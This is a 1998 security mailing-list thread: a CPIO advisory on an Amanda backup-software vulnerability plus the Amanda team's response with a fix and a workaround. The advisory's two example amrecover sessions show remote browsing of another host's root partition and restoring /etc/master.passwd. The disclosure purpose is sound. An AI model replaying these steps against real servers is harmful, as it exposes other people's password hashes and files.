X-RDate: Tue, 20 Jan 1998 11:24:33 +0500 (ESK)
Date: Sat, 10 Jan 1998 11:01:43 -0800
From: Gale Pedowitz <gale@darpanet.net>
To: best-of-security@cyber.com.au
Subject: BoS: CPIO-SN #11980105: Amanda v2.3.0.4 Backup Software
Cheers, all,
The notice that was sent out at 4AM today was released in error. This is
the actual release.
CPIO apologizes for the confusion.
--
**************** CPIO Security Notice ****************
Issue 11: 980105
Topic: Amanda v2.3.0.4 Backup Software
Platforms: Platform-independent
************** http://www.darpanet.net **************
This release concerns vulnerabilities in the Amanda backup software
suite; remote users may exploit these vulnerabilities to view arbitrary
files on Amanda network backup clients.
SUMMARY
There are several security problems in the current version of Amanda. The
vulnerabilities detailed here are two of many discovered by an OpenBSD
security audit. The Amanda core team has been contacted.
I. Any attacker can connect remotely to an index server, thus
permitting access to any machine being backed up.
II. A malicious local user may access any partition or any files
on a machine backed up through the network via Amanda.
EXAMPLE I:
index.servername.net | the affected index server
remote.attacker.org | attacker's host
staff | a machine being backed up by the index server
[remote%] amrecover -s index.servername.net
AMRECOVER Version 1.0. Contacting server on index.servername.net ...
220 index.servername.net AMANDA index server (1.0) ready.
Setting restore date to today (1997-12-24)
200 Working date set to 1997-12-24.
200 Config set to DailySet1.
501 No index records for host: remote.attacker.org. Invalid?
amrecover> sethost staff
200 Dump host set to staff.
amrecover> setdisk wd0a
200 Disk set to wd0a
amrecover> ls
[ list of root partion ]
EXAMPLE II:
users | users shell machine being backed up
staff | staff machine being backed up
[users%] amrecover
AMRECOVER Version 1.0. Contacting server on index.servername.net ...
220 index.servername.net AMANDA index server (1.0) ready.
Setting restore date to today (1997-12-24)
200 Working date set to 1997-12-24.
200 Config set to DailySet1.
200 Dump host set to users.
Divided $CWD into directory /joey on disk wd0f mounted at /home/home1.
200 Disk set to wd0f.
amrecover> setdisk wd0a
200 Disk set to wd0a
amrecover> cd etc
amrecover> add master.passwd
Added /etc/master.passwd
amrecover> extract
Extracting files using tape drive /dev/nrst0 on host index.servername.net.
The following tapes are needed: DAILY6
Restoring files into directory /home/home1/joey
Continue? [Y/n]: y
Load tape DAILY6 now
Continue? [Y/n]: y
amrecover> quit
[local%] pwd
/home/home1/joey
[local%] ls master.passwd
master.passwd
AFFECTED PLATFORMS AND NOTES
This vulnerability is related to problems in the software itself, and
appears to be platform-independent. Known (tested) afflicted platforms
include OpenBSD and Linux.
FIXES
A patch from the authors is forthcoming. The only known workaround at this
time is to completely disable Amanda.
CREDITS
This vulnerability was discovered and described by Joey Novell
<joey@cpio.org>. Gale Pedowitz <gale@cpio.org> edited and prepared
this release. Other contributors include Jonathan Katz <jkatz@cpio.org>.
Date: Tue, 13 Jan 1998 07:33:19 -0200
Reply-To: Alexandre Oliva <oliva@DCC.UNICAMP.BR>
Sender: avalon
>From: Alexandre Oliva <oliva@DCC.UNICAMP.BR>
Subject: Re: CPIO-SN #11980105: Amanda v2.3.0.4 Backup Software
X-To: amanda-announce@amanda.org
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: Gale Pedowitz's message of "Sat, 10 Jan 1998 11:01:43 -0800"
Approved: darrenr@cyber.com.au
X-Originally-To: To: BUGTRAQ@NETSPACE.ORG
X-Originated-From: From: Gale Pedowitz <gale@DARPANET.NET>
AMANDA TEAM RESPONSE TO CPIO Security Notice Issue 11:
The Amanda development team confirms the existence of the amrecover
security hole in recent versions of Amanda. We have made a new
release, Amanda 2.4.0b5, that fixes the amrecover problem and other
potential security holes, and is the product of a security audit
conducted in conjunction with the OpenBSD effort. The new version is
available at:
ftp://ftp.amanda.org/pub/amanda/amanda-2.4.0b5.tar.gz
Here's some more information about the amrecover problem to supplement the
information given in the CPIO Security Notice:
VERSIONS AFFECTED:
The Amanda 2.3.0.x interim releases that introduced amrecover, and the
2.4.0 beta releases by the Amanda team are vulnerable.
Amanda 2.3.0 and earlier UMD releases are not affected by this particular
bug, as amrecover was not part of those releases. However, earlier
releases do have potential security problems and other bugs, so the Amanda
Team recommends upgrading to the new release as soon as practicable.
WORKAROUND:
At an active site running Amanda 2.3.0.x or 2.4.0 beta, amrecover/amindexd
can be disabled by:
- removing amandaidx and amidxtape from /etc/inetd.conf
- restarting inetd.conf (kill -HUP should do)
This will avoid this particular vulnerability while continuing to run backups.
However, other vulnerabilities might exist, so the Amanda Team recommends
upgrading to the new release as soon as practicable.
ACKNOWLEGMENTS:
This release (2.4.0) has addressed a number of security concerns with
the assistance of Theo de Raadt, Ejovi Nuwere and David Sacerdote of
the OpenBSD project. Thanks guys! Any problems that remain are our
own fault, of course.
The Amanda Team would also like to thank the many other people who have
contributed suggestions, patches, and new subsystems for Amanda. We're
grateful for any contribution that helps us achieve and sustain critical
mass for improving Amanda.
